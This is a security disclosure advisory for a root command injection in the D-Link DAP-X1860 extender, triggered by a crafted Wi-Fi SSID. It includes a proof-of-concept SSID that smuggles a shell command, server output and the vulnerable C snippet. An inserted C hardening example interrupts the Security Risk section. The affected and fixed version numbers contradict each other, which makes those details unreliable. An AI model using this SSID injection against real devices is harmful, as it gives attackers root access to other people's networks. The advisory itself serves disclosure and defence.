# Advisory: D-Link DAP-X1860: Remote Command Injection

The Wi-Fi network scanning functionality of the D-Link DAP-X1860 range extender is susceptible to remote command injection. Attackers who create a Wi-Fi network with a crafted SSID in range of the extender can run shell commands during the setup process or when using the network scan function of the range extender.

### Details

- Product: D-Link DAP-X1860
- Affected Versions: Tested on 1.00, 1.01b94, 1.01b05-01; other versions may be affected, too
- Fixed Versions: 1.00b12
- Vulnerability Type: Command Injection
- Security Risk: medium
- Vendor URL: `https://eu.dlink.com/de/de/products/dap-x1860-ax1800-mesh-wifi-6-range-extender`
- Vendor Status: fixed version released
- Advisory URL: `https://www.redteam-pentesting.de/advisories/rt-sa-2023-006`
- Advisory Status: published
- CVE: CVE-2023-45208
- CVE URL: `https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45208`

### Introduction

The D-Link DAP-X1860 is a Mesh Wi-Fi 6 Range Extender.

### More Details

During the setup process of the range extender, nearby Wi-Fi networks are identified using the SOAP action "GetSiteSurvey".
If a Wi-Fi network with an apostrophe in its SSID (such as "Olaf's Network") is in range of the extender, the setup process crashes repeatedly with the following response from the server:

```
Error 500: Internal Server Error
CGI program sent malformed HTTP headers: [0 1 ***** **:**:**:**:**:** WPA2PSK/AES 7 11b/g/n NONE In 17 YES NO
1 1 ***** **:**:**:**:**:** WPA2PSK/AES 24 11b/g/n NONE In 13 YES NO
2 1 ***** **:**:**:**:**:** WPA2PSK/AES 47 11b/g/n/ax NONE In 13 YES NO
3 1 ***** **:**:**:**:**:** WPAPSKWPA2PSK/TKIPAES 81 11b/g/n NONE In 7 YES NO
4 1 ***** **:**:**:**:**:** WPA2PSKWPA3PSK/AES 63 11b/g/n/ax NONE In 19 YES NO
5 1 ***** **:**:**:**:**:** WPA2PSK/AES 44 11b/g/n/ax NONE In 5 NO NO
6 1 Olafs Network **:**:**:**:**:** WPA2PSK/AES 47 11b/g/n/ax NONE In 20 NO NO
sh: 7: not found
sh
```

The output `sh: 7: not found` indicates that the extender attempted to execute some command, and the apostrophe that was originally present in the Wi-Fi network name "Olaf's Network" is missing in the output. Additionally, the sixth line does not have the same alignment of spaces as the other lines. This alone can be exploited as a denial-of-service vulnerability, as the setup process cannot be finished. However, it was also possible to execute arbitrary commands on the extender. For instance, it was attempted to inject the command `uname -a`, which prints general kernel information. To do this, a Wi-Fi network within range was created with an SSID starting with a single quote and the command separated by the logical shell operator "&&".
The network was started using create_ap ():

```
$ create_ap -n wlan0 "Test' && uname -a &&" randompw98zwrd8g283d3
```

After rescanning for Wi-Fi networks on the range extender, this results in an HTTP 500 error code, including the output of the injected command:

```
Error 500: Internal Server Error
CGI program sent malformed HTTP headers: [0 1 ***** **:**:**:**:**:** WPA2PSK/AES 0 11b/g/n NONE In 17 YES NO
1 1 Test
Linux dlink-rp 4.4.198 #3 SMP Mon Jan 11 10:38:51 CST 2021 mips GNU/Linux
sh: **:**:**:**:**:**: not found
sh: 2: not found
sh: 3: not found
sh: 4: not found
[...]
sh: 40: not
```

As can be seen, the command was executed and its output was printed in the response. Further analysis of the device revealed that all processes on the device, including the injected commands, run as the high-privileged root user.

The vulnerability originates from the parsing_xml_stasurvey function in libcgifunc.so, where a system command containing the SSIDs from the Wi-Fi scan results is executed without proper escaping:

```
[...]
snprintf(acStack_1a0,100,"echo %s > /tmp/Channel_check",&scanned_ap_info);
system(acStack_1a0);
[...]
```

### Proof of Concept

Create a Wi-Fi network with an SSID containing a single quote, followed by some shell command separator, e.g. "&&", and the command to be run. In the following, create_ap () was used to create the Wi-Fi network:

```
$ create_ap -n wlan0 "Test' && uname -a &&" random98zwrd8g283d3
```

To trigger the exploit, run the setup process of the range extender or, if it is already configured, run a network scan. The output of the command can be seen in the HTTP responses of the extender's web interface.

### Security Risk

Attackers that are physically located in the Wi-Fi range of the extender may leverage this vulnerability to obtain access to the extender's local network.
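As an added illustration that is not part of this advisory or of D-Link's firmware, the following C program shows a shell-free replacement for the `echo %s > /tmp/Channel_check` plus `system()` pattern from parsing_xml_stasurvey described in More Details, together with a check that flags scan results whose SSID carries shell metacharacters. The function names and the output path are assumptions.

```c
/* Added example, not D-Link's code: a shell-free replacement for the
 * "echo %s > /tmp/Channel_check" + system() pattern described above,
 * plus a check that flags SSIDs carrying shell metacharacters.
 * Function names and the output path are assumptions. */
#include <stdio.h>
#include <string.h>

/* Returns 1 if the SSID contains a byte a POSIX shell treats specially.
 * Useful for logging suspicious scan results; not a substitute for the fix. */
int ssid_has_shell_metachars(const char *ssid) {
    static const char meta[] = "'\"`$&|;<>()\\\n";
    for (; *ssid; ssid++)
        if (strchr(meta, *ssid)) return 1;
    return 0;
}

/* Hardened replacement: write the scan result with stdio instead of
 * building a shell command, so SSID bytes are data, never command text.
 * Returns 0 on success, -1 on error. */
int write_channel_check(const char *path, const char *scanned_ap_info) {
    FILE *f = fopen(path, "w");
    if (!f) return -1;
    int rc = (fputs(scanned_ap_info, f) >= 0 && fputc('\n', f) != EOF) ? 0 : -1;
    if (fclose(f) != 0) rc = -1;
    return rc;
}

/* Returns 1 if the file at path holds exactly expected followed by '\n'. */
int channel_check_matches(const char *path, const char *expected) {
    char buf[256];
    FILE *f = fopen(path, "r");
    if (!f) return 0;
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    return n == strlen(expected) + 1 && memcmp(buf, expected, n - 1) == 0 && buf[n - 1] == '\n';
}

int main(void) {
    const char *ssid = "Test' && uname -a &&";       /* PoC SSID from the advisory */
    const char *path = "/tmp/channel_check_example"; /* constructed path */
    printf("shell metacharacters in SSID: %d\n", ssid_has_shell_metachars(ssid));
    if (write_channel_check(path, ssid) == 0 && channel_check_matches(path, ssid))
        printf("SSID stored verbatim as data in %s, no shell involved\n", path);
    return 0;
}
```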
While the injected commands are only executed during device setup or during a manual Wi-Fi scan, attackers could try to de-authenticate the extender so that the owner triggers a Wi-Fi scan to make the extender work again. As a result, this vulnerability is rated to pose a medium risk.

### Timeline

- 2023-05-06 Vulnerability identified
- 2023-05-08 Reported to `security@dlink.com`
- 2023-06-19 After receiving no reply, a reminder was sent to `security@dlink.com`
- 2023-07-21 After again receiving no reply, a D-Link security contact known from a previous disclosure was notified directly
- 2023-08-07 After again receiving no reply, another reminder was sent to `security@dlink.com`
- 2023-10-05 CVE ID requested
- 2023-10-05 CVE ID assigned
- 2023-10-09 Advisory released
- 2023-10-25 Hotfix patch released by vendor ()
- 2023-11-16 RedTeam Pentesting contacted vendor via support chat as the hotfix patch cannot be installed due to a wrong firmware format
- 2023-11-17 Vendor sent firmware (DAPX1860A1_FW101B05_20231107_beta01.bin) with patch in correct format
- 2023-11-23 RedTeam Pentesting confirmed that the vulnerability is still present and informed the vendor
- 2023-11-24 Vendor replied
- 2023-12-21 Vendor sent RedTeam Pentesting a new firmware (DAP-X1860_RevA_Firmware_101b05-01_20231219.bin) for confirmation
- 2024-01-03 RedTeam Pentesting confirmed that the vulnerability is fixed
- 2024-01-03 Vendor released firmware 1.01b05-01 on product website ()

### RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. In this way, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only a few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance public knowledge through research in security-related areas. The results are made available as public security advisories.
More information about RedTeam Pentesting can be found at:

### Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested, please visit: